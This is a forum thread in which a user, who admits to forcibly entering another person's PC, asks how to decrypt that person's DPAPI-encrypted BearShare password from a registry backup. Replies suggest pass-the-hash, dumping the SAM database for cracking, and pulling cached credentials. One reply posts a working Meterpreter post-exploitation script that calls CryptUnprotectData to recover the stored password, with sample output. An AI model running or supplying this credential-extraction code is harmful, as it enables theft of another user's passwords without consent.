Mycael Posted February 27, 2013 Share Posted February 27, 2013 Greetings! I'm having a problem with a Hex-code Password from a registry file. Its related with Bearshare. I fed in a hex to ASCII converter, and this string pops out: Ð Ñ O eMž í» EncryptedString ü ©c \ °·Ûv â Ë ¥ ³ M3æ ¥Ç" ïr©ÜVâ5à $l Ž Lol, any help would be greatly appreciated. Thanks! > Registry Contents below: "Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\ 00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\ 00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\ 00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\ 63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\ 00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\ a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\ 04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40 "AutoConnect"=dword:00000001 "RememberPassword"=dword:00000001 "Default"=dword:00000001 "Status"=dword:00000001 "Guest"=dword:00000000 "LoginUserType"=dword:00000000 "ActiveTabInSearch"=dword:00000000 "ActiveTabInWeb"=dword:00000000 "AdditionalResults"=dword:0000002d Quote Link to comment Share on other sites More sharing options...
digip Posted February 27, 2013 Share Posted February 27, 2013 (edited) its not straight hex, its like binary or encrypted data mixed in. I stripped some of the data out just so you can see the readable string part: Ð ß Ñ z ÀOÂ ë ® e¾MH ® í »u E n c r y p t e d S t r i n g f ü ©rcÜ\£° ·éÛlvç â Ë6 5¥Ø³¨Mp3Pæ] ¥öÇR")ï rU© Ü oV|âe5 àZ $$wlÑ ½ @ you can use http://home.paulschou.net/tools/xlate/ to decode hex, but this is probably got more to it than just hex in it. Edited February 27, 2013 by digip Quote Link to comment Share on other sites More sharing options...
bwall Posted February 28, 2013 Share Posted February 28, 2013 Looks like it might be a DPAPI blob, which means without the master key, user's password and possible entropy, you can't decrypt it without being logged in as that user. http://msdn.microsoft.com/en-us/library/ms995355.aspx Quote Link to comment Share on other sites More sharing options...
Mycael Posted February 28, 2013 Author Share Posted February 28, 2013 Thing is. The account of said "user" had his password changed forcefully by an administrative account. This change invalidated all stored password, including this one. Before this happened, however, I managed to back-up this registry thinking it could be of use. This password being user&password dependent makes me wonder if there are other means to decipher the contents of this hex. I still have access to the user's PC and account. (After forceful entry ofcourse) Wondering if its possible to revert the user's account settings to the before-forceful-entry. Any ideas? Thanks for the earlier posts. Really appreciate them :) Quote Link to comment Share on other sites More sharing options...
digip Posted March 1, 2013 Share Posted March 1, 2013 If you have the original key, and access to the users session, under their sign on, you can repolace the reg key, then yes, it will put it back, but that depends on your level of access and lockdown of registry, group policy, etc. Its easier, to login to the users session with the current password, and just changing it via control panel, but if its a domain login, the password is a different setup, one for local login, one for domainm which is controlled by the domain controller and the users session is logging in remotely. Cached credentials can sometimes be pulled depending on if they left default group policy settings in effect, you can also bypass all of it with a pass the hash attack to just use the token shared between live sessions. If the password is what you want to decrypt though, grab the sam database and use something like ophtcrack to retrieve the password, but that probably only contains the local admin pass and not the domain pass. I'm not 100% sure how to get a domain password for a user but I imaging its probably a hashed key like you showed above that is decrypted during login with some function at the domain controller end. Been so long since I've even had to think about these processes since mcse classes, I don't even remember how the storage works any more, and with windoes server 2008 i know the data is backwards compatible but also has newer secure storage of data that may be diff than say, working on win2000 and win2003. Best guy to ask that would probably know, is Mubix. Quote Link to comment Share on other sites More sharing options...
mubix Posted March 3, 2013 Share Posted March 3, 2013 (edited) Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb) def prepare_railgun rg = session.railgun if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end end def decrypt_password(data) rg = session.railgun pid = client.sys.process.getpid process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(128) process.memory.write(mem, data) if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" addr = [mem].pack("V") len = [data.length].pack("V") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) #print_status("#{ret.inspect}") len, addr = ret["pDataOut"].unpack("V2") else addr = [mem].pack("Q") len = [data.length].pack("Q") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) len, addr = ret["pDataOut"].unpack("Q2") end return "" if len == 0 decrypted_pw = process.memory.read(addr, len) return decrypted_pw end def get_valdata(k, name) @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com' registry_getvaldata("#{@key_base}\\#{k}", name) end prepare_railgun data = get_valdata("",'Password') print_error data.inspect password = decrypt_password(data) print_status password.inspect And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password' meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "password\x00" I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator: meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "" No joy (as expected) Edited March 3, 2013 by mubix Quote Link to comment Share on other sites More sharing options...
mubix Posted March 3, 2013 Share Posted March 3, 2013 If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password Quote Link to comment Share on other sites More sharing options...
Mycael Posted March 4, 2013 Author Share Posted March 4, 2013 Speechless @Mubix and digip You guys are awesome! Will give this a shot; I'll update as soon as I get results. Thanks for the effort and support :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.